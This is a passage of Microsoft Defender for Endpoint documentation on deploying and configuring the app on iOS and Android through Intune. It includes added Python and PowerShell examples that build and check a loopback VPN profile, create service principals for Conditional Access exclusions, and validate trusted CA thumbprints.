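    vendor_config = {onboarding_key: "True"}
    if allow_toggle_in_app:
        vendor_config["EnableVPNToggleInApp"] = "TRUE"
    return {
        "PayloadType": "com.apple.vpn.managed",
        "PayloadVersion": 1,
        "PayloadIdentifier": f"{DEFENDER_BUNDLE_ID}.vpn.{uuid.uuid4()}",  # generated here
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadDisplayName": connection_name,
        "UserDefinedName": connection_name,
        "VPNType": "VPN",                      # "Custom VPN": a third-party provider app
        "VPNSubType": DEFENDER_BUNDLE_ID,      # the app that implements the tunnel
        "VPN": {
            "RemoteAddress": LOOPBACK_ADDRESS,  # self-looping: traffic stays on the device
            "AuthenticationMethod": "Password",  # "Username and password"
            "ProviderType": "packet-tunnel",
            "OnDemandEnabled": 1,               # "On-demand VPN"
            "OnDemandRules": [{"Action": "Connect"}],  # Connect VPN for all domains
        },
        "VendorConfig": vendor_config,         # Intune key-value pairs (assumption)
    }


def build_profile(payload: dict) -> bytes:
    """Wrap one payload in a top-level configuration profile and serialise it as an XML plist."""
    profile = {
        "PayloadType": "Configuration",
        "PayloadVersion": 1,
        "PayloadIdentifier": f"{DEFENDER_BUNDLE_ID}.profile.{uuid.uuid4()}",
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadDisplayName": payload["PayloadDisplayName"],
        "PayloadContent": [payload],
    }
    return plistlib.dumps(profile)


def check_profile(profile_bytes: bytes) -> list[str]:
    """Return review findings for a profile; an empty list means it matches the expected shape."""
    findings: list[str] = []
    profile = plistlib.loads(profile_bytes)
    vpns = [p for p in profile.get("PayloadContent", [])
            if p.get("PayloadType") == "com.apple.vpn.managed"]
    if len(vpns) != 1:
        return [f"expected exactly one VPN payload, found {len(vpns)}"]
    vpn = vpns[0]
    settings = vpn.get("VPN", {})

    if vpn.get("VPNSubType") != DEFENDER_BUNDLE_ID:
        findings.append(f"VPNSubType {vpn.get('VPNSubType')!r} is not {DEFENDER_BUNDLE_ID}")
    remote = settings.get("RemoteAddress", "")
    try:
        if not ipaddress.ip_address(remote).is_loopback:
            findings.append(f"RemoteAddress {remote} is not loopback; traffic would leave the device")
    except ValueError:
        findings.append(f"RemoteAddress {remote!r} is not an IP address")
    vendor = vpn.get("VendorConfig", {})
    modes = [k for k in ("SilentOnboard", "AutoOnboard") if str(vendor.get(k, "")).lower() == "true"]
    if len(modes) != 1:
        findings.append(f"expected exactly one of SilentOnboard/AutoOnboard, found {modes}")
    rules = settings.get("OnDemandRules", [])
    if not settings.get("OnDemandEnabled") or not any(r.get("Action") == "Connect" for r in rules):
        findings.append("on-demand Connect rule missing; VPN would not start automatically")
    return findings


def misconfigured_example() -> list[str]:
    """Constructed bad profile: off-device server address (documentation range) and both onboarding keys."""
    payload = build_vpn_payload("Microsoft Defender for Endpoint", "SilentOnboard")
    payload["VPN"]["RemoteAddress"] = "203.0.113.10"
    payload["VendorConfig"]["AutoOnboard"] = "True"
    return check_profile(build_profile(payload))


if __name__ == "__main__":
    good = build_profile(build_vpn_payload("Microsoft Defender for Endpoint", "AutoOnboard", True))
    print(good.decode())
    print("findings:", check_profile(good) or "none")
    print("findings for misconfigured profile:", misconfigured_example())
```

Intune generates the profile itself, so the renderer is only a way to see what is being pushed; the checker is what is worth keeping, since it can be run against a profile exported from a device to confirm the loopback address and the provider bundle id before trusting that web traffic is not being tunnelled elsewhere.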

User Enrollment setup (only for Intune User Enrolled devices)

Important

User Enrollment for Microsoft Defender on iOS is in public preview. The following
information relates to prereleased product which may be substantially modified
before it's commercially released. Microsoft makes no warranties, express or
implied, with respect to the information provided here.

Microsoft Defender iOS app can be deployed on the Intune User Enrolled devices using
the following steps.

Admin

1. Set up User Enrollment Profile in Intune. Intune supports account driven Apple
User Enrollment and Apple User Enrollment with Company Portal. Read more
about the comparison of the two methods and select one.

Set up user enrollment with Company Portal
Set up account driven user enrollment

2. Set up SSO Plugin. The Authenticator app with SSO extension is a pre-requisite for user
enrollment on an iOS device.

Create a Device configuration profile in Intune: Configure iOS/iPadOS
Enterprise SSO plug-in with MDM | Microsoft Learn.
Make sure to add these two keys in the above configuration:
App bundle ID: Include the Defender App bundle ID in this list:
com.microsoft.scmx
Additional configuration: Key - device_registration ; Type - String ; Value -
{{DEVICEREGISTRATION}}

3. Set up the MDM Key for User Enrollment.

In Intune, go to Apps > App configuration policies > Add > Managed
devices.
Give the policy a name and select Platform > iOS/iPadOS.
Select Microsoft Defender for Endpoint as the target app.
On the Settings page, select Use configuration designer and add
UserEnrolmentEnabled as the key, value type as String, value as True.

4. Admin can push Defender as a required VPP app from Intune.

End User
Defender app is installed into the user's device. User signs in and completes the
onboarding. Once the device is successfully onboarded, it will be visible in the Defender
Security Portal under Device Inventory.

Supported features and limitations

1. All current capabilities of Defender for Endpoint on iOS are supported, such as Web protection, Network
Protection, Jailbreak detection, Vulnerabilities in OS and Apps, Alerting in the Defender
Security Portal, and Compliance policies.
2. Zero touch (silent) deployment and auto onboarding of VPN are not supported with
User Enrollment, since admins cannot push a device-wide VPN profile with User
Enrollment.
3. For Vulnerability management of apps, only apps in the work profile will be visible.
4. Read more on the User Enrollment limitations and capabilities.

Complete onboarding and check status

1. Once Defender for Endpoint on iOS has been installed on the device, you will see
the app icon.
2. Tap the Defender for Endpoint app icon (MSDefender) and follow the on-screen
instructions to complete the onboarding steps. The details include end-user
acceptance of iOS permissions required by Defender for Endpoint on iOS.

Note

Skip this step if you configure zero touch (silent) onboarding. Manually launching the
application is not necessary if zero touch (silent) onboarding is configured.

3. Upon successful onboarding, the device will start showing up on the Devices list in
the Microsoft Defender portal.

Next Steps
Configure app protection policy to include Defender for Endpoint risk signals
(MAM)
Configure Defender for Endpoint on iOS features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Deploy Microsoft Defender for Endpoint
on iOS with Mobile Application
Management
Article • 05/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

Defender for Endpoint on iOS uses a VPN in order to provide the Web Protection
feature. This is not a regular VPN and is a local/self-looping VPN that does not take
traffic outside the device.

Configure Microsoft Defender for Endpoint risk signals in app protection policy (MAM)

Microsoft Defender for Endpoint on iOS, which already protects enterprise users in
Mobile Device Management (MDM) scenarios, now extends support to Mobile App
Management (MAM) for devices that are not enrolled using Intune mobile device
management (MDM). It also extends this support to customers who use other enterprise
mobility management solutions while still using Intune for mobile application
management (MAM). This capability allows you to manage and protect your
organization's data within an application.

Microsoft Defender for Endpoint on iOS threat information is leveraged by Intune App
Protection Policies to protect these apps. App protection policies (APP) are rules that
ensure an organization's data remains safe or contained in a managed app. A managed
application has app protection policies applied to it and can be managed by Intune.

Microsoft Defender for Endpoint on iOS supports both MAM configurations:

Intune MDM + MAM: IT administrators can only manage apps using App
Protection Policies on devices that are enrolled with Intune mobile device
management (MDM).
MAM without device enrollment: MAM without device enrollment, or MAM-WE,
allows IT administrators to manage apps using App Protection Policies on devices
not enrolled with Intune MDM. This means apps can be managed by Intune on
devices enrolled with third-party EMM providers.

To manage apps in both of the above configurations, customers should use Intune in the
Microsoft Intune admin center.

To enable this capability an administrator needs to configure the connection between
Microsoft Defender for Endpoint and Intune, create the app protection policy, and apply
the policy on targeted devices and applications.

End users also need to take steps to install Microsoft Defender for Endpoint on their
device and activate the onboarding flow.

Pre-requisites

1. Verify that the Intune connector is enabled in the Security portal.
In the unified security console, go to Settings > Endpoints > Advanced
Features and ensure that Microsoft Intune connection is enabled.

2. Verify that the APP connector is enabled in the Intune portal.
In the Microsoft Intune admin center, go to Endpoint Security > Microsoft
Defender for Endpoint and ensure that the Connection status is enabled.

Create an app protection policy

Block access or wipe data of a managed app based on Microsoft Defender for Endpoint risk signals by creating an app protection policy. Microsoft Defender for Endpoint can be configured to send threat signals to be used in app protection policies (APP, also known as MAM). With this capability, you can use Microsoft Defender for Endpoint to protect managed apps.

1. Create a policy
App protection policies (APP) are rules that ensure an organization's data remains
safe or contained in a managed app. A policy can be a rule that is enforced when
the user attempts to access or move "corporate" data, or a set of actions that are
prohibited or monitored when the user is inside the app.

2. Add apps
a. Choose how you want to apply this policy to apps on different devices. Then add
at least one app.
Use this option to specify whether this policy applies to unmanaged devices. You
can also choose to target your policy to apps on devices of any management state.
Because mobile app management doesn't require device management, you can
protect company data on both managed and unmanaged devices. The
management is centered on the user identity, which removes the requirement for
device management. Companies can use app protection policies with or without
MDM at the same time. For example, consider an employee that uses both a
phone issued by the company, and their own personal tablet. The company phone
is enrolled in MDM and protected by app protection policies while the personal
device is protected by app protection policies only.

b. Select Apps
A managed app is an app that has app protection policies applied to it, and can be
managed by Intune. Any app that has been integrated with the Intune SDK or
wrapped by the Intune App Wrapping Tool can be managed using Intune app
protection Policies. See the official list of Microsoft Intune protected apps that
have been built using these tools and are available for public use.

Example: Outlook as a managed app


Select the Platform, Apps, Data protection, Access requirements settings that
your organization requires for your policy.

3. Set sign-in security requirements for your protection policy.

Select Setting > Max allowed device threat level in Conditional Launch > Device Conditions and enter a value. This will need to be configured to either Low, Medium, High, or Secured. The actions available to you will be Block access or Wipe data. Select Action: "Block Access". Microsoft Defender for Endpoint on iOS shares this Device Threat Level.

4. Assign user groups for whom the policy needs to be applied.

Select Included groups. Then add the relevant groups.

For more information on MAM or app protection policy, see iOS app protection policy
settings.
Deploy Microsoft Defender for Endpoint for
MAM or on unenrolled devices
Microsoft Defender for Endpoint on iOS enables the app protection policy scenario and
is available in the Apple app store.

When app protection policies are configured for apps to include device risk signals from
Microsoft Defender for Endpoint, users will be redirected to install Microsoft Defender
for Endpoint when using such apps. Alternately, users can also install the latest version
of the app directly from the Apple app store.

Ensure the device is registered to Authenticator with the same account being used to
onboard in Defender for successful MAM registration.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Resources for Microsoft Defender for Endpoint
for mobile devices
Article • 02/09/2024

Microsoft Defender for Endpoint provides multiple capabilities on mobile devices. Some of these
capabilities are set to default, and some require admin configuration. The following table shows how to
configure the resources related to Microsoft Defender for Endpoint on Android and iOS.

Feature configurations

Configuration | Description | Android AE config key | Android MAM | iOS
--- | --- | --- | --- | ---
Web Protection | Admins can use this setting to change the web protection feature. When disabled, end users aren't asked for VPN permissions. | Antiphishing = 0/1 (default), VPN = 0/1 (default) | Antiphishing = 0/1 (default), VPN = 0/1 (default) | WebProtection = true (default)/false
Network Protection | Network protection is disabled by default. Admins can enable it to include rogue WiFi and certificate detection (only available on Android) on mobile. | Enable Network protection in Microsoft Defender = 0 (default)/1 | DefenderNetworkProtectionEnable = 0 (default)/1 | DefenderNetworkProtectionEnable = 0 (default)/1

Privacy configuration

Configuration | Description | Android AE config key | Android MAM | iOS
--- | --- | --- | --- | ---
Privacy for phishing alert report | If privacy is enabled, Defender for Endpoint won't send domain name and website details. | Hide URLs in report = 0 (default)/1 | DefenderExcludeURLInReport = 0 (default)/1 | DefenderExcludeURLInReport = 0 (default)/1
Configure privacy for malware threat report | Control the collection of app details (name, package information) in the threat report. | Hide app details in report = 0 (default)/1 | DefenderExcludeAppInReport = 0 (default)/1 |
Configure privacy in vulnerability assessment of apps | Control what app data shows up in the security portal when Defender for Vulnerability Management is enabled. | Enable Vulnerability Management privacy = 0 (default)/1 | DefenderTVMPrivacyMode = 0 (default)/1 | DefenderTVMPrivacyMode = 0 (default)/1
Network protection | Control the collection of network and certificate details in the alert report. | Enable Network protection privacy = 1/0 | DefenderNetworkProtectionPrivacy = 1/0 | DefenderNetworkProtectionPrivacy

Other configurations

Configuration | Description | Android AE config key | Android MAM | iOS
--- | --- | --- | --- | ---
Disable/enable sign out | Sign out option can be disabled for an end user. This helps prevent tampering with the device. | Disable sign out = 1 (default)/0 | DisableSignOut = 1/0 | DisableSignOut = 1/0
Device tagging | Defender for Endpoint enables bulk tagging mobile devices during onboarding. Admins can set up tags using this configuration by using Intune. | Device tag (Value as String) | DefenderDeviceTag (Value as String) | DefenderDeviceTag (Value as String)
Optional Permissions | Admins can make some permissions optional for the end user while onboarding Defender for Endpoint. Users see an option to grant these permissions later. | NA | DefenderOptionalVPN = 0 (default)/1, DefenderOptionalAccessibility = 0 (default)/1 | DefenderOptionalVPN = 0 (default)/1, DefenderOptionalAccessibility = 0 (default)/1

Alerts severity and privacy information

Alert type | Severity | Privacy information (Android) | Privacy information (iOS)
--- | --- | --- | ---
Anti-phishing (Defender warning) | Informational | URL of malicious connection, connection information, Protocol type; More information | Domain name, IP address of malicious website; More information
Anti-phishing (Defender warning overlooked) | Low | |
Anti-malware | Medium | Information about malicious APKs including install source, storage location, time of install, etc.; More information |
Jailbreak | High | NA | NA
Rogue Wifi | Low | |
Open Network detection | Informational | |
Suspicious certificates | Informational | |

Complete privacy information for Android

Complete privacy information for iOS

Microsoft Defender Mobile App exclusion from Conditional Access (CA) Policies

The Microsoft Defender Mobile app is a security app that needs to be running constantly in the background to report the device security posture. This security posture is used in the Compliance and App Protection policies to secure the managed apps and ensure that corporate data is accessed only from a secured device. However, restrictive Conditional Access policies, such as Block policies based on certain locations or policies that enforce frequent sign-ins, can result in Defender being blocked from reporting posture. If the Defender app fails to report the device posture, a device that is under threat can go unreported, leaving corporate data on the device vulnerable. To ensure seamless protection, we recommend excluding the Defender app from the blocking Conditional Access policy.

Apps required to exclude:

1. Xplat Broker App (a0e84e36-b067-4d5c-ab4a-3db38e598ae2): Xplat Broker App is the application responsible for forwarding Defender risk signals to the Defender backend. However, the presence of restrictive CA policies can result in Defender being blocked from reporting signals. In these scenarios, we recommend excluding the Xplat Broker App. Note that Xplat Broker App is also used by other platforms like Mac and Linux, so if the same policy applies to these platforms, it is better to create a separate Conditional Access policy for mobile.

2. TVM app (e724aa31-0f56-4018-b8be-f8cb82ca1196): Microsoft Defender for Mobile TVM (Threat and Vulnerability Management) is the service that provides the vulnerability assessment for the apps installed on iOS devices. However, the presence of restrictive CA policies can result in Defender being blocked from communicating the onboarding requests to the TVM backend services. This service should be excluded if MDVM (Vulnerability Assessment) is used in the organization.

Steps to exclude:

1. Create a service principal for each of the apps that need to be excluded. See Steps to create service principal.
2. While creating the service principal object above, use these app IDs: Xplat Broker App (a0e84e36-b067-4d5c-ab4a-3db38e598ae2), TVM app (e724aa31-0f56-4018-b8be-f8cb82ca1196).
3. After the object is successfully created, the two apps are visible in the CA screen and can be excluded.
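The following Microsoft Graph PowerShell snippet is an added example, not code from this page or from Microsoft, that performs steps 1 and 2 above in one go: it creates the service principals for the two app IDs the page lists, skipping any that already exist so the script can be re-run safely. It assumes the Microsoft.Graph.Applications module is installed and that the signed-in account can consent to Application.ReadWrite.All; the display labels in the hashtable are only for the script's own output.

```powershell
# Added example (not from the Microsoft Learn page): create the service principals
# for the two Defender mobile apps so they can be excluded from a Conditional
# Access policy. Assumes the Microsoft Graph PowerShell SDK
# (Microsoft.Graph.Applications) is installed and the signed-in account can
# consent to Application.ReadWrite.All.

# App IDs exactly as listed on the page; the labels are for this script's output only.
$defenderMobileApps = [ordered]@{
    'Xplat Broker App'                  = 'a0e84e36-b067-4d5c-ab4a-3db38e598ae2'
    'Microsoft Defender for Mobile TVM' = 'e724aa31-0f56-4018-b8be-f8cb82ca1196'
}

Connect-MgGraph -Scopes 'Application.ReadWrite.All'

$excludable = foreach ($entry in $defenderMobileApps.GetEnumerator()) {
    $appId = $entry.Value
    # A service principal may already exist in the tenant (for example after a user
    # consented to the app), so look before creating to keep the script re-runnable.
    $sp = Get-MgServicePrincipal -Filter "appId eq '$appId'"
    if (-not $sp) {
        $sp = New-MgServicePrincipal -AppId $appId
        Write-Host "Created service principal for $($entry.Key) ($appId)"
    }
    else {
        Write-Host "Service principal for $($entry.Key) already exists ($appId)"
    }
    $sp
}

# These two objects are what you pick when excluding apps in the Conditional
# Access policy editor (step 3 on the page).
$excludable | Select-Object DisplayName, AppId, Id
```

The exclusion itself is still done in the Conditional Access policy editor; the script only makes the two apps selectable there and confirms their object IDs.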

Configure Defender for Endpoint on
Android features
Article • 08/04/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Conditional Access with Defender for Endpoint on Android
Microsoft Defender for Endpoint on Android, along with Microsoft Intune and Microsoft
Entra ID, enables enforcing Device compliance and Conditional Access policies based on
device risk levels. Defender for Endpoint is a Mobile Threat Defense (MTD) solution that
you can deploy through Intune.

For more information about how to set up Defender for Endpoint on Android and
Conditional Access, see Defender for Endpoint and Intune.

Configure custom indicators

7 Note

Defender for Endpoint on Android only supports creating custom indicators for IP
addresses and URLs/domains.

Defender for Endpoint on Android enables admins to configure custom indicators to support Android devices as well. For more information on how to configure custom indicators, see Manage indicators.

Configure web protection

Defender for Endpoint on Android allows IT administrators to configure the web protection feature. This capability is available within the Microsoft Intune admin center.

Web protection helps to secure devices against web threats and protect users from phishing attacks. Anti-phishing and custom indicators (URL and IP addresses) are supported as part of web protection. Web content filtering is currently not supported on mobile platforms.

7 Note

Defender for Endpoint on Android uses a VPN in order to provide the Web Protection feature. This VPN is not a regular VPN. Instead, it's a local/self-looping VPN that does not take traffic outside the device.

For more information, see Configure web protection on devices that run Android.

Network Protection
This feature provides protection against rogue Wi-Fi related threats and rogue
certificates, which are the primary attack vector for Wi-Fi networks. Admins can list the
root Certificate Authority (CA) and private root CA certificates in Microsoft Intune admin
center and establish trust with endpoints. It provides the user a guided experience to
connect to secure networks and also notifies them if a related threat is detected.

It includes several admin controls to offer flexibility, such as the ability to configure the
feature from within the Microsoft Intune admin center and add trusted certificates.
Admins can enable privacy controls to configure the data sent to Defender for Endpoint
from Android devices.

Network protection in Microsoft Defender for Endpoint is disabled by default. Admins can use the following steps to configure Network protection on Android devices.

1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies. Create a new App configuration policy.
2. Provide a name and description to uniquely identify the policy. Select 'Android Enterprise' as the platform, 'Personally-owned work profile only' as the profile type, and 'Microsoft Defender' as the Targeted app.
3. On the Settings page, select 'Use configuration designer' and add 'Enable Network Protection in Microsoft Defender' as the key and '1' as the value to enable Network Protection. (Network protection is disabled by default.)
4. If your organization uses root CAs that are private, you must establish explicit trust between Intune (MDM solution) and user devices. Establishing trust helps prevent Defender from flagging root CAs as rogue certificates.

   To establish trust for the root CAs, use 'Trusted CA certificate list for Network Protection' as the key. In the value, add the 'comma separated list of certificate thumbprints (SHA 1)'.

   Example of thumbprint format to add: 50 30 06 09 1d 97 d4 f5 ae 39 f7 cb e7 92 7d 7d 65 2d 34 31, 503006091d97d4f5ae39f7cbe7927d7d652d3431

   ) Important

   Certificate SHA-1 thumbprint characters must be either white-space separated or not separated at all.

   This format is invalid: 50:30:06:09:1d:97:d4:f5:ae:39:f7:cb:e7:92:7d:7d:65:2d:34:31
   Any other separation characters are invalid.

5. For other configurations related to Network protection, add the following keys and the appropriate corresponding value.

Configuration Key | Description
--- | ---
Trusted CA certificate list for Network Protection | Security admins manage this setting to establish trust for root CA and self-signed certificates.
Enable Network protection in Microsoft Defender | 1 - Enable, 0 - Disable (default). This setting is used by the IT admin to enable or disable the network protection capabilities in the Defender app.
Enable Network Protection Privacy | 1 - Enable (default), 0 - Disable. Security admins manage this setting to enable or disable privacy in network protection.
Enable Users to Trust Networks and Certificates | 1 - Enable, 0 - Disable (default). Security admins manage this setting to enable or disable the end user's in-app experience to trust and untrust unsecure and suspicious networks and malicious certificates.
Automatic Remediation of Network Protection Alerts | 1 - Enable (default), 0 - Disable. Security admins manage this setting to enable or disable the remediation alerts that are sent when a user performs remediation activities, such as switching to a safer Wi-Fi access point or deleting suspicious certificates detected by Defender.
Manage Network Protection detection for Open Networks | 0 - Disable (default), 1 - Audit Mode, 2 - Enable. Security admins manage this setting to disable, audit, or enable open network detection, respectively. In 'Audit' mode, alerts are sent only to the ATP portal with no end user experience. For user experience, set the config to 'Enable' mode.
Manage Network protection Detection for Certificates | 0 - Disable, 1 - Audit mode (default), 2 - Enable. When network protection is enabled, Audit mode for certificate detection is enabled by default. In Audit mode, notification alerts are sent to SOC admins, but no end-user notifications are displayed to the user when Defender detects a bad certificate. Admins can, however, disable this detection with 0 as the value and enable full feature functionality by setting 2 as the value. When the feature is enabled with the value of 2, end-user notifications are sent to the user when Defender detects a bad certificate, and alerts are also sent to the SOC Admin.

6. Add the required groups to which the policy will have to be applied. Review and
create the policy.

Configuration Key | Description
--- | ---
Enable Network protection in Microsoft Defender | 1: Enable; 0: Disable (default). This setting is used by the IT admin to enable or disable the network protection capabilities in the Defender app.
Enable Network Protection Privacy | 1: Enable (default); 0: Disable. Security admins manage this setting to enable or disable privacy in network protection.
Enable Users to Trust Networks and Certificates | 1: Enable; 0: Disable (default). This setting is used by IT admins to enable or disable the end user in-app experience to trust and untrust the unsecure and suspicious networks and malicious certificates.
Automatic Remediation of Network Protection Alerts | 1: Enable (default); 0: Disable. This setting is used by IT admins to enable or disable the remediation alerts that are sent when a user does remediation activities. For example, the user switches to a safer Wi-Fi access point or deletes suspicious certificates that were detected by Defender.
Manage Network Protection detection for Open Networks | 0: Disable (default); 1: Audit Mode. Security admins manage this setting to enable or disable open network detection.
Manage Network protection Detection for Certificates | 0: Disable; 1: Audit mode (default); 2: Enable. When network protection is enabled, Audit mode for certificate detection is enabled by default. In audit mode, notification alerts are sent to SOC admins, but no end user notifications are shown when Defender detects a bad certificate. Admins can disable this detection with the value 0 or enable full feature functionality by setting the value 2. When the value is 2, end user notifications are sent to users and alerts are sent to SOC admins when Defender detects a bad certificate.

7. Add the required groups to which the policy has to be applied. Review and create
the policy.
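The trusted CA list in step 4 above accepts SHA-1 thumbprints only as contiguous hex or as white-space separated byte pairs and rejects colon separated strings. The PowerShell below is an added example, not part of this page or of the Defender product: it validates pasted thumbprints against that rule and builds the comma separated value directly from CA certificate files, so the value cannot be mistyped. The function names and the certificate file paths are assumptions made for the example; the three sample thumbprints are the ones shown on the page.

```powershell
# Added example (not from the Microsoft Learn page): validate thumbprints for the
# 'Trusted CA certificate list for Network Protection' key and build the value
# from certificate files. Function names and file paths are assumptions.

function Test-DefenderThumbprint {
    # Returns $true when a thumbprint is in one of the two accepted formats:
    # 40 contiguous hex digits, or 20 hex byte pairs separated by white space.
    # Colons or any other separator are rejected, as the page states.
    param([Parameter(Mandatory)][string]$Thumbprint)

    $t = $Thumbprint.Trim()
    if ($t -match '^[0-9A-Fa-f]{40}$') { return $true }                          # contiguous
    if ($t -match '^([0-9A-Fa-f]{2}[ \t]+){19}[0-9A-Fa-f]{2}$') { return $true }  # space separated
    return $false
}

function Get-DefenderTrustedCaThumbprintList {
    # Reads DER/PEM certificate files and returns the comma separated, space-free
    # SHA-1 thumbprint string to paste into the Intune configuration designer value.
    param([Parameter(Mandatory)][string[]]$CertificatePath)

    $thumbprints = foreach ($path in $CertificatePath) {
        $full = (Resolve-Path $path).ProviderPath
        # X509Certificate2.Thumbprint is the SHA-1 hash as 40 contiguous hex characters,
        # which is already one of the accepted formats.
        $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $full
        $cert.Thumbprint
    }
    return ($thumbprints -join ', ')
}

# Check the page's own sample values (two valid, one invalid).
$candidates = @(
    '50 30 06 09 1d 97 d4 f5 ae 39 f7 cb e7 92 7d 7d 65 2d 34 31',   # valid: white-space separated
    '503006091d97d4f5ae39f7cbe7927d7d652d3431',                      # valid: contiguous
    '50:30:06:09:1d:97:d4:f5:ae:39:f7:cb:e7:92:7d:7d:65:2d:34:31'    # invalid: colon separated
)
foreach ($c in $candidates) {
    if (Test-DefenderThumbprint $c) { "ACCEPT  $c" } else { "REJECT  $c" }
}

# Build the value from your own CA certificate files (paths are placeholders):
# Get-DefenderTrustedCaThumbprintList -CertificatePath '.\corp-root-ca.cer', '.\corp-issuing-ca.cer'
```

Running the check before saving the policy catches the colon separated form that certificate viewers commonly copy out, which Defender would otherwise silently fail to match against the device's certificate chain.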

7 Note

Users need to enable the location permission (which is an optional permission); this enables Defender for Endpoint to scan their networks and alert them when there are Wi-Fi-related threats. If the location permission is denied by the user, Defender for Endpoint will only be able to provide limited protection against network threats and will only protect users from rogue certificates.

Privacy Controls

The following privacy controls are available for configuring the data that is sent by Defender for Endpoint from Android devices:

Threat Report | Details
--- | ---
Malware report | Admins can set up privacy control for the malware report. If privacy is enabled, then Defender for Endpoint won't send the malware app name and other app details as part of the malware alert report.
Phish report | Admins can set up privacy control for phishing reports. If privacy is enabled, then Defender for Endpoint won't send the domain name and details of the unsafe website as part of the phishing alert report.
Vulnerability assessment of apps | By default only information about apps installed in the work profile is sent for vulnerability assessment. Admins can disable privacy to include personal apps.
Network Protection (preview) | Admins can enable or disable privacy in network protection. If enabled, then Defender won't send network details.

Configure privacy alert report

Admins can now enable privacy control for the phishing report, malware report, and network report sent by Microsoft Defender for Endpoint on Android. This configuration ensures that the domain name, app details, and network details, respectively, aren't sent as part of the alert whenever a corresponding threat is detected.

Admin Privacy Controls (MDM)

Use the following steps to enable privacy.

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.
2. Give the policy a name, select Platform > Android Enterprise, and select the profile type.
3. Select Microsoft Defender for Endpoint as the target app.
4. On the Settings page, select Use configuration designer and then select Add.
5. Select the required privacy setting:
   - Hide URLs in report
   - Hide URLs in report for personal profile
   - Hide app details in report
   - Hide app details in report for personal profile
   - Enable Network Protection Privacy
6. To enable privacy, enter the integer value 1 and assign this policy to users. By default, this value is set to 0 for MDE in the work profile and 1 for MDE on the personal profile.
7. Review and assign this profile to targeted devices/users.

End user privacy controls

These controls help the end user configure the information shared with their organization.

1. For Android Enterprise work profile, end user controls won't be visible. Admins control these settings.
2. For Android Enterprise personal profile, the control is displayed under Settings > Privacy.
3. Users see a toggle for Unsafe Site Info, malicious application, and network protection.

These toggles are only visible if enabled by the admin. Users can decide whether they want to send the information to their organization or not.

Enabling/disabling the above privacy controls won't impact the device compliance check or conditional access.

Configure vulnerability assessment of apps for BYOD devices

From version 1.0.3425.0303 of Microsoft Defender for Endpoint on Android, you're able to run vulnerability assessments of the OS and apps installed on the onboarded mobile devices.

7 Note

Vulnerability assessment is part of Microsoft Defender Vulnerability Management in Microsoft Defender for Endpoint.

Notes about privacy related to apps from personal devices (BYOD):

- For Android Enterprise with a work profile, only apps installed on the work profile will be supported.
- For other BYOD modes, by default, vulnerability assessment of apps will not be enabled. However, when the device is in administrator mode, admins can explicitly enable this feature through Microsoft Intune to get the list of apps installed on the device. For more information, see the details below.

Configure privacy for device administrator mode

Use the following steps to enable vulnerability assessment of apps from devices in device administrator mode for targeted users.

7 Note

By default, this is turned off for devices enrolled with device admin mode.

1. In the Microsoft Intune admin center, go to Devices > Configuration profiles > Create profile and enter the following settings:
   - Platform: Select Android device administrator
   - Profile: Select "Custom" and select Create.
2. In the Basics section, specify a name and description of the profile.
3. In the Configuration settings, select Add OMA-URI setting:
   - Name: Enter a unique name and description for this OMA-URI setting so you can find it easily later.
   - OMA-URI: ./Vendor/MSFT/DefenderATP/DefenderTVMPrivacyMode
   - Data type: Select Integer in the drop-down list.
   - Value: Enter 0 to disable the privacy setting (by default, the value is 1).
4. Select Next and assign this profile to targeted devices/users.

Configure privacy for Android Enterprise work profile

Defender for Endpoint supports vulnerability assessment of apps in the work profile. However, in case you want to turn off this feature for targeted users, you can use the following steps:

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.
2. Give the policy a name; Platform > Android Enterprise; select the profile type.
3. Select Microsoft Defender for Endpoint as the target app.
4. On the Settings page, select Use configuration designer and add DefenderTVMPrivacyMode as the key and Integer as the value type.
   - To disable vulnerability assessment of apps in the work profile, enter the value 1 and assign this policy to users. By default, this value is set to 0.
   - For users with the key set to 0, Defender for Endpoint sends the list of apps from the work profile to the backend service for vulnerability assessment.
5. Select Next and assign this profile to targeted devices/users.

Turning the above privacy controls on or off won't impact the device compliance check or conditional access.

Configure privacy for phishing alert report

Privacy control for the phish report can be used to disable the collection of domain name or website information in the phish threat report. This setting gives organizations the flexibility to choose whether they want to collect the domain name when a malicious or phish website is detected and blocked by Defender for Endpoint.

Configure privacy for phishing alert report on Android

Device Administrator enrolled devices:
Use the following steps to turn it on for targeted users:

1. In the Microsoft Intune admin center, go to Devices > Configuration profiles > Create profile and enter the following settings:
   - Platform: Select Android device administrator.
   - Profile: Select "Custom" and select Create.
2. In the Basics section, specify a name and description of the profile.
3. In the Configuration settings, select Add OMA-URI setting:
   - Name: Enter a unique name and description for this OMA-URI setting so you can find it easily later.
   - OMA-URI: ./Vendor/MSFT/DefenderATP/DefenderExcludeURLInReport
   - Data type: Select Integer in the drop-down list.
   - Value: Enter 1 to enable the privacy setting. The default value is 0.
4. Select Next and assign this profile to targeted devices/users.

Using this privacy control won't impact the device compliance check or conditional access.

Configure privacy for phishing alert report on Android Enterprise work profile

Use the following steps to turn on privacy for targeted users in the work profile:

1. In the Microsoft Intune admin center, go to Apps > App configuration policies > Add > Managed devices.
2. Give the policy a name, Platform > Android Enterprise, select the profile type.
3. Select Microsoft Defender for Endpoint as the target app.
4. On the Settings page, select Use configuration designer and add DefenderExcludeURLInReport as the key and Integer as the value type. Enter 1 to enable privacy. The default value is 0.
5. Select Next and assign this profile to targeted devices/users.

Turning the above privacy controls on or off won't impact the device compliance check or conditional access.

Configure privacy for malware threat report

Privacy control for the malware threat report can be used to disable the collection of app details (name and package information) from the malware threat report. This setting gives organizations the flexibility to choose whether they want to collect the app name when a malicious app is detected.

Configure privacy for malware alert report on Android

Device Administrator enrolled devices:
Use the following steps to turn it on for targeted users:

